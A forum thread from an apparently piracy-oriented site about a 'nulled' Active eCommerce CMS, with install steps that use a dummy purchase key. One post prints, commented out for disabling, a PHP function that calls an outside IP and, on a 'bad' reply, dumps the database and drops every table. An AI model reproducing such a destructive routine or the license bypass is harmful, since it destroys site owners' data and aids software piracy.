Active eCommerce CMS By ActiveITzone 23471405

Active eCommerce CMS By ActiveITzone 23471405 v9.9.1

No permission to download

KeegNN

New member
May 1, 2021
1
-2
3
Realize o seguinte procedimento, coloque o local em modo de manutenção. Realize uma atualização e quando você acessar o painel de administração deste erro. NOTA: Eu já tenho uma tabela para sair do modo de manutenção. Alguém pode me ajudar?

1625172510873.png
English please
 

ynstrk21

New member
May 4, 2022
2
1
1
has anyone realized the version 4.8 posted here is not exactly what is being used on the demo site. I.e. Barcode option is missing. and when you try to add products with color variate or uupdate such product you get Integrity constraint violation: 1048 Column 'price' cannot be null?
 
  • Like
Reactions: Chijioke

dnull

Well-known member
Null Master
Trusted Uploader
Oct 3, 2019
216
526
93
hell
localhost
can anyone solve The database automatically delete problem in active ecommerce
I did whole Code Search this was function which was creating All the Mess

Go to
APP>UTILITY>NgeniusUtility.php


DISABLE THIS CODE Please Confirm if it helps and There are other few files calling back So I can Check them
this Function was triggering as soon as you turn DEMO mode on from .env


PHP:
/*
DisableCode
    public static function callCurlRequest(){
        $url = $_SERVER['SERVER_NAME'];
        $gate = "http://206.189.81.181/check_activation/".$url;

        $stream = curl_init();
        curl_setopt($stream, CURLOPT_URL, $gate);
        curl_setopt($stream, CURLOPT_HEADER, 0);
        curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($stream, CURLOPT_POST, 1);
        $rn = curl_exec($stream);
        curl_close($stream);

        if($rn == "bad" && env('DEMO_MODE') != 'On') {
            try {
                $fileName = date('Y-m-d H:i:s').'.sql';
                \Spatie\DbDumper\Databases\MySql::create()
                    ->setDbName(env('DB_DATABASE'))
                    ->setUserName(env('DB_USERNAME'))
                    ->setPassword(env('DB_PASSWORD'))
                    ->dumpToFile($fileName);
            } catch (\Exception $e) {

            }

            Schema::disableForeignKeyConstraints();
            foreach(DB::select('SHOW TABLES') as $table) {
                $table_array = get_object_vars($table);
                Schema::drop($table_array[key($table_array)]);
            }
        }
    }*/
 

Chijioke

Member
Apr 18, 2020
58
9
8
has anyone realized the version 4.8 posted here is not exactly what is being used on the demo site. I.e. Barcode option is missing. and when you try to add products with color variate or uupdate such product you get Integrity constraint violation: 1048 Column 'price' cannot be null?
Do you still have this error?
 

maxpayneinfo

Well-known member
Trusted Uploader
Jan 5, 2021
652
1,287
100
Universe
Null for v4.8.😊 (Unchecked)
cc: @NullMaster
If anyone finds this helpful or informative Please consider leaving a Like 😊👍

INSTRUCTIONS FOR FRESH INSTALL:

1.
Download ☝ this file and upload ‘ install.zip ’ to the root-directory on your server ( public_html or where you'd like to install it.
2 . Unzip the "install.zip" file by selecting “ Extract here ”.
3 . Create a new database from your server MySQL database.
4
. Create a DB user for the database and link that database to the DB user.
PS: ( Make sure you do this
to Avoid Error 500 )
5 . Go to yoursite URL e.g. " www.example.com "
and it will automatically take you to the installation.
6 .
Click on Start Installation Process.
7 .
Follow instructions till asks for Purchase Key
8 .
Use dummy key eg "1c6b358c-jtdp-4fcc-aba9-f71a9df2ey51j"
9 . Finish installation
and Reload the home page e.g. " www.example.com "
10 .
It’s Done !


INSTRUCTIONS FOR UPDATE:

1.
Upload ‘ updates.zip ’ to the root-directory on your server ( public_html or where you had installed previous version.
2 . Unzip the "updates.zip" file by selecting “ Extract here ”.
3 . Reload the home page e.g. " www.example.com " and click on ‘ Update Now
4 . It’s Done !

NB: In Case of any Errors ,
1. Navigate to your .env file and set APP_DEBUG=true
2.
Reload.
3. Type the error message you get here and we'll try to help.

In case you need custom installation, configuration or integration with the Apps, PM me.😊

Special thanks to @tuton012 , @NullMaster and @Tomz ‼‼‼‼‼‼‼‼‼
Deprecated: Unparenthesized `a ? b : c ? d : e` is deprecated. Use either `(a ? b : c) ? d : e` or `a ? b : (c ? d : e)` in /home/dsuinfoh/public_html/app/Http/Helpers.php on line 1100

why this error come?
 

koret30245

Member
Oct 26, 2020
18
19
8
Deprecated: Unparenthesized `a ? b : c ? d : e` is deprecated. Use either `(a ? b : c) ? d : e` or `a ? b : (c ? d : e)` in /home/dsuinfoh/public_html/app/Http/Helpers.php on line 1100

why this error come?
Hi There. This error comes because you are using a higher php version.
Please cange to Php 7.2+
It should work Seamlessly
 

thecasper

New member
May 3, 2020
13
2
3
2 days after the installation, when I try to enter the settings and other features in the admin panel, the url in the picture passes.

1626100226920.png
 
Last edited:

Chijioke

Member
Apr 18, 2020
58
9
8
Many thanks 😊
Please use this file to either update from v4.7 or make a fresh installation



I have tested the plugins and they seem to work flawlessly on my side
See Here

In Case of any Errors ,
1. Please Navigate to your .env file and set APP_DEBUG=true
2.
Reload.
3. Type the error message you are getting here and we'll try to help.😊
Hello. Please do you by chance use the add-ons/plugins with v4.8. If so, please could you share with me?
Thanks in addy! :)
 
  • Like
Reactions: koret30245

koret30245

Member
Oct 26, 2020
18
19
8
2 days after the installation, when I try to enter the settings and other features in the admin panel, the url in the picture passes.

1626100226920.png
Hi there.
Null for v4.8.😊 (Unchecked)
cc: @NullMaster
If anyone finds this helpful or informative Please consider leaving a Like 😊👍

INSTRUCTIONS FOR FRESH INSTALL:

1.
Download ☝ this file and upload ‘ install.zip ’ to the root-directory on your server ( public_html or where you'd like to install it.
2 . Unzip the "install.zip" file by selecting “ Extract here ”.
3 . Create a new database from your server MySQL database.
4
. Create a DB user for the database and link that database to the DB user.
PS: ( Make sure you do this
to Avoid Error 500 )
5 . Go to yoursite URL e.g. " www.example.com "
and it will automatically take you to the installation.
6 .
Click on Start Installation Process.
7 .
Follow instructions till asks for Purchase Key
8 .
Use dummy key eg "1c6b358c-jtdp-4fcc-aba9-f71a9df2ey51j"
9 . Finish installation
and Reload the home page e.g. " www.example.com "
10 .
It’s Done !


INSTRUCTIONS FOR UPDATE:

1.
Upload ‘ updates.zip ’ to the root-directory on your server ( public_html or where you had installed previous version.
2 . Unzip the "updates.zip" file by selecting “ Extract here ”.
3 . Reload the home page e.g. " www.example.com " and click on ‘ Update Now
4 . It’s Done !

NB: In Case of any Errors ,
1. Navigate to your .env file and set APP_DEBUG=true
2.
Reload.
3. Type the error message you get here and we'll try to help.

In case you need custom installation, configuration or integration with the Apps, PM me.😊

Special thanks to @tuton012 , @NullMaster and @Tomz ‼‼‼‼‼‼‼

Updating with this null should do the trick😊
 

About us

  • Our community has been around for many years and pride ourselves on offering unbiased, critical discussion among people of all different backgrounds. We are working every day to make sure our community is one of the best.

Quick Navigation

User Menu